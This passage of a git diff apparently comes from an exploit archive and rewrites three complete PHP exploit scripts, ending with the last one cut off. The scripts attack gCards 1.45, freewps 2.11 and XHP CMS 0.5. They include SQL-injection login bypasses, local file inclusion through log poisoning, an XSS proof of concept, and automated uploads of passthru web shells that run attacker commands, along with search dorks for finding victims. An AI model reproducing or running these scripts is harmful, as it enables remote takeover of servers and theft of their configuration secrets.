$xpl=urlencode($paths[$i]); - $packet ="GET 
".$p."index.php?cmd=".$cmd."&setLang=suntzu&lang[suntzu][file]=".$xpl." HTTP/1.0\r\n"; - $packet.="Host: ".$host."\r\n"; - $packet.="Connection: Close\r\n\r\n"; - #debug, shows packets in a nice format - #echo quick_dump($packet); - sendpacketii($packet); - - if (strstr($html,"666")){ - echo "Exploit succeeded...\r\n"; - $temp=explode("666",$html); - echo $temp[1]; - die; - } - } - -} -else -if ($action=="2") -{ echo "[1] Injecting some SQL statements in admin login username field...\r\n"; - $sql=urlencode("'or'suntzu'='suntzu'/*"); - $data="username=".$sql; - $data.="&userpass=suntzu"; - $packet ="POST ".$p."admin/admin.php HTTP/1.1\r\n"; - $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; - $packet.="Host: ".$host."\r\n"; - $packet.="Content-Length: ".strlen($data)."\r\n"; - $packet.="Connection: Close\r\n\r\n"; - $packet.=$data; - #echo quick_dump($packet); - sendpacketii($packet); - if (strstr($html,"gCards Administration Console")) - {echo "Sql injection succeeded...\r\n";} - else - {die("Not succeeded, maybe we have magic_quotes_gpc on here...\r\n");} - $temp=explode("Set-Cookie: ",$html); - $temp2=explode(" ",$temp[1]); - $cookie=$temp2[0]; - echo "Cookie -> ".$cookie."\r\n"; - echo "[2] Let's retrieve a category name to upload a file in ...\r\n"; - $packet ="GET ".$p."admin/cards.php HTTP/1.1\r\n"; - $packet.="Host: ".$host."\r\n"; - $packet.="Cookie: ".$cookie."\r\n"; - $packet.="Connection: Close\r\n\r\n"; - #echo quick_dump($packet); - sendpacketii($packet); - $temp=explode("<option value=\"",$html); - $temp2=explode("\"",$temp[1]); - $catid=$temp2[0]; - echo "catid -> ".$catid."\r\n"; - if ($catid=="") {$catid=1;} - echo "[3] Uploading a php file...\r\n"; -$data='-----------------------------7d613b1d0448 -Content-Disposition: form-data; name="MAX_FILE_SIZE" - -250000 ------------------------------7d613b1d0448 -Content-Disposition: form-data; name="cardname" - -suntzu ------------------------------7d613b1d0448 -Content-Disposition: 
form-data; name="catid" - -'.$catid.' ------------------------------7d613b1d0448 -Content-Disposition: form-data; name="userfile"; filename="suntzu.php" -Content-Type: application/octet-stream - -<?php echo 666;ini_set("max_execution_time",0);passthru($_GET[cmd]);echo 666;?> ------------------------------7d613b1d0448 -Content-Disposition: form-data; name="userthumb"; filename="suntzu.php" -Content-Type: application/octet-stream - -<?php echo 666;ini_set("max_execution_time",0);passthru($_GET[cmd]);echo 666;?> ------------------------------7d613b1d0448 -Content-Disposition: form-data; name="submit" - -Upload ------------------------------7d613b1d0448 -'; - $packet ="POST ".$p."admin/upload.php HTTP/1.1\r\n"; - $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d613b1d0448\r\n"; - $packet.="Host: ".$host."\r\n"; - $packet.="Content-Length: ".strlen($data)."\r\n"; - $packet.="Connection: Close\r\n"; - $packet.="Cookie: ".$cookie."\r\n\r\n"; - $packet.=$data; - #echo quick_dump($packet); - sendpacketii($packet); - if (strstr($html,"successfully")) - {echo "Succeeded...\r\n";} - else - {die("For some reason...Not succeeded\r\n");} - echo "[4] Let's retrieve the new filename ...\r\n"; - $packet ="GET ".$p."admin/cards.php HTTP/1.1\r\n"; - $packet.="Host: ".$host."\r\n"; - $packet.="Cookie: ".$cookie."\r\n"; - $packet.="Connection: Close\r\n\r\n"; - #echo quick_dump($packet); - sendpacketii($packet); - $temp=explode("suntzu.php",$html); - $temp2=explode("<td>",$temp[count($temp)-2]); - $temp=$temp2[count($temp2)-1]; - $newfile=$temp."suntzu.php"; - if ($newfile=="") {die("For some reason, exploit failed...");} - echo "File renamed to: ".$newfile."\r\n"; - echo "[5] Launch commands ...\r\n"; - $packet ="GET ".$p."images/".$newfile."?cmd=".$cmd." 
HTTP/1.1\r\n"; - $packet.="Host: ".$host."\r\n"; - $packet.="Connection: Close\r\n\r\n"; - #echo quick_dump($packet); - sendpacketii($packet); - if (strstr($html,"666")) - { - echo "Exploit succeeded...\r\n"; - $temp=explode("666",$html); - echo $temp[1]; - die; - } -} -else -{die ("Wrong action...\r\n");} -//if you are here... -echo "Exploit failed...\r\n"; -?> - -# milw0rm.com [2006-03-20] +#!/usr/bin/php -q -d short_open_tag=on +<? +echo "gCards <= 1.45 multiple vulnerabilities\r\n"; +echo "by rgod rgod@autistici.org\r\n"; +echo "site: http://retrogod.altervista.org\r\n\r\n"; +echo "Sun-Tzu:\"At first, then, exhibit the coyness of a maiden, until the\r\n"; +echo "enemy gives you an opening; afterwards emulate the rapidity of a\r\n"; +echo "running hare, and it will be too late for the enemy to oppose you.\"\r\n"; + +echo "dork: \"powered by gcards\"\r\n\r\n"; + +/* + +explaination: +software site: http://www.gregphoto.net/gcards/index.php + +i) vulnerable code in inc/setLang.php: + +<? + if ($page->languageredirect == $_SERVER['PHP_SELF']) { + if (isset($_GET['setLang'])) $_SESSION['setLang'] = $_GET['setLang']; + } + + $langFile = $page->relpath.'inc/lang/'.$lang[$_SESSION['setLang']]['file']; + + if (file_exists($langFile)) { + include_once($langFile); + } + else { + echo "Could not find language file $langFile"; + } +?> + +this code is included by main script, so ... arbitrary local inclusion, poc: + +http://[target]/[path]/index.php?setLang=suntzu&lang[suntzu][file]=../../../../../../../../../../../var/log/httpd/access_log + +this works regardless of any magic_quotes_gpc settings, apart open_basedir +restrictions obviously + +ii) also we have SQL injection in admin authentication procedure, admin/loginfunction.php +at lines 28-38: + +... 
+ $username = $_POST['username']; + $userpass = $_POST['userpass']; + if ($username && $userpass) + { + include('../inc/adodb/adodb.inc.php'); # load code common to ADOdb + include('../config.php'); + $ADODB_FETCH_MODE = ADODB_FETCH_ASSOC; + $conn = &ADONewConnection('mysql'); # create a connection + $conn->Connect($dbhost,$dbuser,$dbpass,$dbdatabase); + $pass = md5($userpass); + $sqlstmt = "SELECT role FROM ".$tablePrefix."cardusers WHERE username='$username' AND userpass='$pass'"; +... + +login as admin typing: + +username: 'or'suntzu'='suntzu'/* +password: [whatever] + +this works with magic_quotes_gpc=Off + +once you are admin, you can upload php files, files are renamed but gcards keep +php extension, so you can launch commands from them + +iii)xss: + +http://[target]/[path]/index.php?setLang=suntzu&lang[suntzu][file]=%3Cscript%3Ealert(document.cookie)%3C/script%3E + +this exploit does the dirty work for i) and ii) + + */ +if ($argc<5) { +echo "Usage: php ".$argv[0]." host path action cmd OPTIONS\r\n"; +echo "host: target server (ip/hostname)\r\n"; +echo "path: path to gcards\r\n"; +echo "action: 1 - launch commands through arbitrary local inclusion\r\n"; +echo " (no php.ini restriction)\r\n"; +echo " 2 - launch commands through sql injection/admin auth bypass\r\n"; +echo " (works with magic_quotes_gpc = Off\r\n"; +echo "cmd: a shell command\r\n"; +echo "Options:\r\n"; +echo " -p[port]: specify a port other than 80\r\n"; +echo " -P[ip:port]: specify a proxy\r\n"; +echo "Examples:\r\n"; +echo "php ".$argv[0]." localhost /gcards/ 2 cat ./../config.php\r\n"; +echo "php ".$argv[0]." localhost /gcards/ 1 cat config.php\r\n"; +echo "php ".$argv[0]." localhost /gcards/ 1 cat config.php -p81\r\n"; +echo "php ".$argv[0]." 
localhost /gcards/ 1 cat config.php -P1.1.1.1:80\r\n"; +die; +} + +error_reporting(0); +ini_set("max_execution_time",0); +ini_set("default_socket_timeout",5); + +function quick_dump($string) +{ + $result='';$exa='';$cont=0; + for ($i=0; $i<=strlen($string)-1; $i++) + { + if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) + {$result.=" .";} + else + {$result.=" ".$string[$i];} + if (strlen(dechex(ord($string[$i])))==2) + {$exa.=" ".dechex(ord($string[$i]));} + else + {$exa.=" 0".dechex(ord($string[$i]));} + $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} + } + return $exa."\r\n".$result; +} +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); + #debug + #echo "\r\n".$html; +} + +function make_seed() +{ + list($usec, $sec) = explode(' ', microtime()); + return (float) $sec + ((float) $usec * 100000); +} + +$host=$argv[1]; +$path=$argv[2]; +$action=$argv[3]; +$cmd="";$port=80;$proxy=""; + +for ($i=4; $i<=$argc-1; $i++){ +$temp=$argv[$i][0].$argv[$i][1]; +if (($temp<>"-p") and ($temp<>"-P")) +{$cmd.=" ".$argv[$i];} +if ($temp=="-p") +{ + $port=str_replace("-p","",$argv[$i]); +} +if ($temp=="-P") +{ + $proxy=str_replace("-P","",$argv[$i]); +} +} +$cmd=urlencode($cmd); + +if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} +if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} + +echo "action selected -> ".$action."\r\n"; +if ($action=="1") +{ + echo "[1] Injecting some code in log files...\r\n"; + $CODE ='<?php ob_clean();echo 666;if (get_magic_quotes_gpc()) {$_GET[cmd]=striplashes($_GET[cmd]);}'; + $CODE.='passthru($_GET[cmd]);echo 666;die;?>'; + $packet.="GET ".$p.$CODE." 
HTTP/1.1\r\n"; + $packet.="User-Agent: ".$CODE."\r\n"; + $packet.="Host: ".$host."\r\n"; + $packet.="Connection: close\r\n\r\n"; + #debug + #echo quick_dump($packet); + sendpacketii($packet); + + # fill with possible locations + $paths= array ( + "../../../../../../../../../../var/log/httpd/access_log", + "../../../../../../../../../../var/log/httpd/error_log", + "../apache/logs/error.log", + "../apache/logs/access.log", + "../../apache/logs/error.log", + "../../apache/logs/access.log", + "../../../apache/logs/error.log", + "../../../apache/logs/access.log", + "../../../../apache/logs/error.log", + "../../../../apache/logs/access.log", + "../../../../../../../../../../etc/httpd/logs/acces_log", + "../../../../../../../../../../etc/httpd/logs/acces.log", + "../../../../../../../../../../etc/httpd/logs/error_log", + "../../../../../../../../../../etc/httpd/logs/error.log", + "../../../../../../../../../../var/www/logs/access_log", + "../../../../../../../../../../var/www/logs/access.log", + "../../../../../../../../../../usr/local/apache/logs/access_log", + "../../../../../../../../../../usr/local/apache/logs/access.log", + "../../../../../../../../../../var/log/apache/access_log", + "../../../../../../../../../../var/log/apache/access.log", + "../../../../../../../../../../var/log/access_log", + "../../../../../../../../../../var/www/logs/error_log", + "../../../../../../../../../../var/www/logs/error.log", + "../../../../../../../../../../usr/local/apache/logs/error_log", + "../../../../../../../../../../usr/local/apache/logs/error.log", + "../../../../../../../../../../var/log/apache/error_log", + "../../../../../../../../../../var/log/apache/error.log", + "../../../../../../../../../../var/log/access_log", + "../../../../../../../../../../var/log/error_log" + ); + + for ($i=0; $i<=count($paths)-1; $i++) + { + $j=$i+2; + echo "[".$j."] Trying with ".$paths[$i]."\r\n"; + $xpl=urlencode($paths[$i]); + $packet ="GET 
".$p."index.php?cmd=".$cmd."&setLang=suntzu&lang[suntzu][file]=".$xpl." HTTP/1.0\r\n"; + $packet.="Host: ".$host."\r\n"; + $packet.="Connection: Close\r\n\r\n"; + #debug, shows packets in a nice format + #echo quick_dump($packet); + sendpacketii($packet); + + if (strstr($html,"666")){ + echo "Exploit succeeded...\r\n"; + $temp=explode("666",$html); + echo $temp[1]; + die; + } + } + +} +else +if ($action=="2") +{ echo "[1] Injecting some SQL statements in admin login username field...\r\n"; + $sql=urlencode("'or'suntzu'='suntzu'/*"); + $data="username=".$sql; + $data.="&userpass=suntzu"; + $packet ="POST ".$p."admin/admin.php HTTP/1.1\r\n"; + $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; + $packet.="Host: ".$host."\r\n"; + $packet.="Content-Length: ".strlen($data)."\r\n"; + $packet.="Connection: Close\r\n\r\n"; + $packet.=$data; + #echo quick_dump($packet); + sendpacketii($packet); + if (strstr($html,"gCards Administration Console")) + {echo "Sql injection succeeded...\r\n";} + else + {die("Not succeeded, maybe we have magic_quotes_gpc on here...\r\n");} + $temp=explode("Set-Cookie: ",$html); + $temp2=explode(" ",$temp[1]); + $cookie=$temp2[0]; + echo "Cookie -> ".$cookie."\r\n"; + echo "[2] Let's retrieve a category name to upload a file in ...\r\n"; + $packet ="GET ".$p."admin/cards.php HTTP/1.1\r\n"; + $packet.="Host: ".$host."\r\n"; + $packet.="Cookie: ".$cookie."\r\n"; + $packet.="Connection: Close\r\n\r\n"; + #echo quick_dump($packet); + sendpacketii($packet); + $temp=explode("<option value=\"",$html); + $temp2=explode("\"",$temp[1]); + $catid=$temp2[0]; + echo "catid -> ".$catid."\r\n"; + if ($catid=="") {$catid=1;} + echo "[3] Uploading a php file...\r\n"; +$data='-----------------------------7d613b1d0448 +Content-Disposition: form-data; name="MAX_FILE_SIZE" + +250000 +-----------------------------7d613b1d0448 +Content-Disposition: form-data; name="cardname" + +suntzu +-----------------------------7d613b1d0448 +Content-Disposition: 
form-data; name="catid" + +'.$catid.' +-----------------------------7d613b1d0448 +Content-Disposition: form-data; name="userfile"; filename="suntzu.php" +Content-Type: application/octet-stream + +<?php echo 666;ini_set("max_execution_time",0);passthru($_GET[cmd]);echo 666;?> +-----------------------------7d613b1d0448 +Content-Disposition: form-data; name="userthumb"; filename="suntzu.php" +Content-Type: application/octet-stream + +<?php echo 666;ini_set("max_execution_time",0);passthru($_GET[cmd]);echo 666;?> +-----------------------------7d613b1d0448 +Content-Disposition: form-data; name="submit" + +Upload +-----------------------------7d613b1d0448 +'; + $packet ="POST ".$p."admin/upload.php HTTP/1.1\r\n"; + $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d613b1d0448\r\n"; + $packet.="Host: ".$host."\r\n"; + $packet.="Content-Length: ".strlen($data)."\r\n"; + $packet.="Connection: Close\r\n"; + $packet.="Cookie: ".$cookie."\r\n\r\n"; + $packet.=$data; + #echo quick_dump($packet); + sendpacketii($packet); + if (strstr($html,"successfully")) + {echo "Succeeded...\r\n";} + else + {die("For some reason...Not succeeded\r\n");} + echo "[4] Let's retrieve the new filename ...\r\n"; + $packet ="GET ".$p."admin/cards.php HTTP/1.1\r\n"; + $packet.="Host: ".$host."\r\n"; + $packet.="Cookie: ".$cookie."\r\n"; + $packet.="Connection: Close\r\n\r\n"; + #echo quick_dump($packet); + sendpacketii($packet); + $temp=explode("suntzu.php",$html); + $temp2=explode("<td>",$temp[count($temp)-2]); + $temp=$temp2[count($temp2)-1]; + $newfile=$temp."suntzu.php"; + if ($newfile=="") {die("For some reason, exploit failed...");} + echo "File renamed to: ".$newfile."\r\n"; + echo "[5] Launch commands ...\r\n"; + $packet ="GET ".$p."images/".$newfile."?cmd=".$cmd." 
HTTP/1.1\r\n"; + $packet.="Host: ".$host."\r\n"; + $packet.="Connection: Close\r\n\r\n"; + #echo quick_dump($packet); + sendpacketii($packet); + if (strstr($html,"666")) + { + echo "Exploit succeeded...\r\n"; + $temp=explode("666",$html); + echo $temp[1]; + die; + } +} +else +{die ("Wrong action...\r\n");} +//if you are here... +echo "Exploit failed...\r\n"; +?> + +# milw0rm.com [2006-03-20] diff --git a/platforms/php/webapps/1600.php b/platforms/php/webapps/1600.php index 0311ce481..74e640372 100755 --- a/platforms/php/webapps/1600.php +++ b/platforms/php/webapps/1600.php 
@@ -1,83 +1,83 @@ -<? -error_reporting(E_ERROR); - -function exploit_init() -{ - if (!extension_loaded('php_curl') && !extension_loaded('curl')) - { - if (!dl('curl.so') && !dl('php_curl.dll')) - die ("oo error - cannot load curl extension!"); - } -} - -function exploit_header() -{ - echo "\noooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo"; - echo " oo ooooooo ooooooo\n"; - echo " oooo oooo o888 o88 888 o888 888o\n"; - echo " 888o888 888 o888 888888888\n"; - echo " o88888o 888 o888 o 888o o888\n"; - echo " o88o o88o o888o o8888oooo88 88ooo88\n"; - echo "ooooooooooooooooooooooooooooo freewps 2.11 exploit ooooooooooooooooooooooooooooo\n"; - echo "oo usage $ php freewps-211-exploit.php [url] [cmd]\n"; - echo "oo proxy support $ php freewps-211-exploit.php [url] [cmd] [proxy]:[port]\n"; - echo "oo example $ php freewps-211-exploit.php http://localhost 'ls -a'\n"; - echo "oo execute a command on the remote system by uploading a shell\n\n"; - echo "oo command : " . $_SERVER['argv'][2] . "\n\n"; -} - -function exploit_bottom() -{ - echo "\noo greets : b0xC - i want to wish you a happy 21st birthday! this is my small\n"; - echo " present for you. :)\n"; - echo "oo discover : x128 - alexander wilhelm - 21/03/2006\n"; - echo "oo contact : exploit <at> x128.net oo website : www.x128.net\n"; -} - -function exploit_execute() -{ - $connection = curl_init(); - - if ($_SERVER['argv'][3]) - { - curl_setopt($connection, CURLOPT_TIMEOUT, 8); - curl_setopt($connection, CURLOPT_PROXY, $_SERVER['argv'][3]); - } - curl_setopt ($connection, CURLOPT_USERAGENT, 'x128'); - curl_setopt ($connection, CURLOPT_RETURNTRANSFER, 1); - curl_setopt ($connection, CURLOPT_HEADER, 0); - - curl_setopt ($connection, CURLOPT_URL, $_SERVER['argv'][1] . "/upload/shell.php"); - $source = curl_exec($connection); - - if(strpos($source, "404")) - { - $shell = fopen("shell.php", "w"); - fwrite($shell, "<? 
ini_set(max_execution_time,0); passthru(\$HTTP_GET_VARS[shell]); ?>"); - fclose($shell); - - curl_setopt ($connection, CURLOPT_URL, $_SERVER['argv'][1] . "/htmlarea/popups/ImageManager/images.php"); - curl_setopt ($connection, CURLOPT_POST, 1); - curl_setopt ($connection, CURLOPT_POSTFIELDS, array("upload" => "@shell.php", "dirPath"=> "/upload")); - curl_exec($connection) or die("oo error - cannot connect!\n"); - - sleep(2); - unlink("shell.php"); - } - curl_setopt ($connection, CURLOPT_POST, 0); - curl_setopt ($connection, CURLOPT_URL, $_SERVER['argv'][1] . "/upload/shell.php?shell=" . urlencode($_SERVER['argv'][2])); - - $source = curl_exec($connection) or die("oo error - cannot connect!\n"); - - echo $source; - - curl_close ($connection); -} - -exploit_init(); -exploit_header(); -exploit_execute(); -exploit_bottom(); -?> - -# milw0rm.com [2006-03-21] +<? +error_reporting(E_ERROR); + +function exploit_init() +{ + if (!extension_loaded('php_curl') && !extension_loaded('curl')) + { + if (!dl('curl.so') && !dl('php_curl.dll')) + die ("oo error - cannot load curl extension!"); + } +} + +function exploit_header() +{ + echo "\noooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo"; + echo " oo ooooooo ooooooo\n"; + echo " oooo oooo o888 o88 888 o888 888o\n"; + echo " 888o888 888 o888 888888888\n"; + echo " o88888o 888 o888 o 888o o888\n"; + echo " o88o o88o o888o o8888oooo88 88ooo88\n"; + echo "ooooooooooooooooooooooooooooo freewps 2.11 exploit ooooooooooooooooooooooooooooo\n"; + echo "oo usage $ php freewps-211-exploit.php [url] [cmd]\n"; + echo "oo proxy support $ php freewps-211-exploit.php [url] [cmd] [proxy]:[port]\n"; + echo "oo example $ php freewps-211-exploit.php http://localhost 'ls -a'\n"; + echo "oo execute a command on the remote system by uploading a shell\n\n"; + echo "oo command : " . $_SERVER['argv'][2] . "\n\n"; +} + +function exploit_bottom() +{ + echo "\noo greets : b0xC - i want to wish you a happy 21st birthday! 
this is my small\n"; + echo " present for you. :)\n"; + echo "oo discover : x128 - alexander wilhelm - 21/03/2006\n"; + echo "oo contact : exploit <at> x128.net oo website : www.x128.net\n"; +} + +function exploit_execute() +{ + $connection = curl_init(); + + if ($_SERVER['argv'][3]) + { + curl_setopt($connection, CURLOPT_TIMEOUT, 8); + curl_setopt($connection, CURLOPT_PROXY, $_SERVER['argv'][3]); + } + curl_setopt ($connection, CURLOPT_USERAGENT, 'x128'); + curl_setopt ($connection, CURLOPT_RETURNTRANSFER, 1); + curl_setopt ($connection, CURLOPT_HEADER, 0); + + curl_setopt ($connection, CURLOPT_URL, $_SERVER['argv'][1] . "/upload/shell.php"); + $source = curl_exec($connection); + + if(strpos($source, "404")) + { + $shell = fopen("shell.php", "w"); + fwrite($shell, "<? ini_set(max_execution_time,0); passthru(\$HTTP_GET_VARS[shell]); ?>"); + fclose($shell); + + curl_setopt ($connection, CURLOPT_URL, $_SERVER['argv'][1] . "/htmlarea/popups/ImageManager/images.php"); + curl_setopt ($connection, CURLOPT_POST, 1); + curl_setopt ($connection, CURLOPT_POSTFIELDS, array("upload" => "@shell.php", "dirPath"=> "/upload")); + curl_exec($connection) or die("oo error - cannot connect!\n"); + + sleep(2); + unlink("shell.php"); + } + curl_setopt ($connection, CURLOPT_POST, 0); + curl_setopt ($connection, CURLOPT_URL, $_SERVER['argv'][1] . "/upload/shell.php?shell=" . urlencode($_SERVER['argv'][2])); + + $source = curl_exec($connection) or die("oo error - cannot connect!\n"); + + echo $source; + + curl_close ($connection); +} + +exploit_init(); +exploit_header(); +exploit_execute(); +exploit_bottom(); +?> + +# milw0rm.com [2006-03-21] diff --git a/platforms/php/webapps/1605.php b/platforms/php/webapps/1605.php index b4b02b04e..9c8f635e3 100755 --- a/platforms/php/webapps/1605.php +++ b/platforms/php/webapps/1605.php 
@@ -1,180 +1,180 @@ -#!/usr/bin/php -q -d short_open_tag=on -<? -echo "XHP CMS <= 0.5 remote cmmnds xctn\r\n"; -echo "by rgod rgod@autistici.org\r\n"; -echo "site: http://retrogod.altervista.org\r\n\r\n"; - -echo "dork: \"powered by XHP CMS\"\r\n\r\n"; - -if ($argc<4) { -echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n"; -echo "host: target server (ip/hostname)\r\n"; -echo "path: path to XHP\r\n"; -echo "cmd: a shell command\r\n"; -echo "Options:\r\n"; -echo " -p[port]: specify a port other than 80\r\n"; -echo " -P[ip:port]: specify a proxy\r\n"; -echo "Examples:\r\n"; -echo "php ".$argv[0]." localhost /xhp/ cat ./../dbconfig.php\r\n"; -echo "php ".$argv[0]." localhost /xhp/ ls -la -p81\r\n"; -echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n"; -die; -} - -/* explaination: - without to have admin rights, you can have access to FileManager plugin - to upload php files: - - http://[target]/[path_to_xhp]/inc/htmlarea/plugins/FileManager/manager.php - - or - - http://[target]/[path_to_xhp]/inc/htmlarea/plugins/FileManager/standalonemanager.php - - after, you can launch commands from them, ex: - - http://[target]/[path]/filemanager/suntzu.php?cmd=cat%20./../dbconfig.php - - */ -error_reporting(0); -ini_set("max_execution_time",0); -ini_set("default_socket_timeout",5); - -function quick_dump($string) -{ - $result='';$exa='';$cont=0; - for ($i=0; $i<=strlen($string)-1; $i++) - { - if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { 
- echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); - #debug - #echo "\r\n".$html; -} - -function make_seed() -{ - list($usec, $sec) = explode(' ', microtime()); - return (float) $sec + ((float) $usec * 100000); -} - -$host=$argv[1]; -$path=$argv[2]; -$action=$argv[3]; -$cmd="";$port=80;$proxy=""; - -for ($i=3; $i<=$argc-1; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if (($temp<>"-p") and ($temp<>"-P")) -{$cmd.=" ".$argv[$i];} -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -} -$cmd=urlencode($cmd); - -if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... 
check the path!'; die;} -if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - - -srand(make_seed()); -$anumber = rand(1,99999); - - echo "[1] Uploading a shell...\r\n"; -$data='-----------------------------7d61592213049c -Content-Disposition: form-data; name="dir" - -/ ------------------------------7d61592213049c -Content-Disposition: form-data; name="upload"; filename="suntzu'.$anumber.'.php" -Content-Type: text/plain - -<?php -if (get_magic_quotes_gpc()){$_GET[cmd]=stripslashes($_GET[cmd]);} -ini_set("max_execution_time",0); -echo "*delim*"; -passthru($_GET[cmd]); -echo "*delim*"; -?> ------------------------------7d61592213049c -Content-Disposition: form-data; name="submit" - -Upload ------------------------------7d61592213049c-- -'; - $packet="POST ".$p."inc/htmlarea/plugins/FileManager/images.php HTTP/1.0\r\n"; - $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61592213049c\r\n"; - $packet.="Host: ".$host."\r\n"; - $packet.="Content-Length: ".strlen($data)."\r\n"; - $packet.="Connection: close\r\n\r\n"; - $packet.=$data; - #echo quick_dump($packet); - sendpacketii($packet); - sleep(1); - echo "[2] Launch commands...\r\n"; - $packet="GET ".$p."filemanager/suntzu".$anumber.".php?cmd=".$cmd." HTTP/1.0\r\n"; - $packet.="Host: ".$host."\r\n"; - $packet.="Connection: Close\r\n\r\n"; - #echo quick_dump($packet); - sendpacketii($packet); - if (strstr($html,"*delim*")) - { - echo "Exploit succeeded...\r\n\r\n"; - $temp=explode("*delim*",$html); - echo $temp[1]; - } - else - {echo "Exploit failed...\r\n";} -?> - -# milw0rm.com [2006-03-22] +#!/usr/bin/php -q -d short_open_tag=on +<? +echo "XHP CMS <= 0.5 remote cmmnds xctn\r\n"; +echo "by rgod rgod@autistici.org\r\n"; +echo "site: http://retrogod.altervista.org\r\n\r\n"; + +echo "dork: \"powered by XHP CMS\"\r\n\r\n"; + +if ($argc<4) { +echo "Usage: php ".$argv[0]." 
host path cmd OPTIONS\r\n"; +echo "host: target server (ip/hostname)\r\n"; +echo "path: path to XHP\r\n"; +echo "cmd: a shell command\r\n"; +echo "Options:\r\n"; +echo " -p[port]: specify a port other than 80\r\n"; +echo " -P[ip:port]: specify a proxy\r\n"; +echo "Examples:\r\n"; +echo "php ".$argv[0]." localhost /xhp/ cat ./../dbconfig.php\r\n"; +echo "php ".$argv[0]." localhost /xhp/ ls -la -p81\r\n"; +echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n"; +die; +} + +/* explaination: + without to have admin rights, you can have access to FileManager plugin + to upload php files: + + http://[target]/[path_to_xhp]/inc/htmlarea/plugins/FileManager/manager.php + + or + + http://[target]/[path_to_xhp]/inc/htmlarea/plugins/FileManager/standalonemanager.php + + after, you can launch commands from them, ex: + + http://[target]/[path]/filemanager/suntzu.php?cmd=cat%20./../dbconfig.php + + */ +error_reporting(0); +ini_set("max_execution_time",0); +ini_set("default_socket_timeout",5); + +function quick_dump($string) +{ + $result='';$exa='';$cont=0; + for ($i=0; $i<=strlen($string)-1; $i++) + { + if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) + {$result.=" .";} + else + {$result.=" ".$string[$i];} + if (strlen(dechex(ord($string[$i])))==2) + {$exa.=" ".dechex(ord($string[$i]));} + else + {$exa.=" 0".dechex(ord($string[$i]));} + $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} + } + return $exa."\r\n".$result; +} +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." 
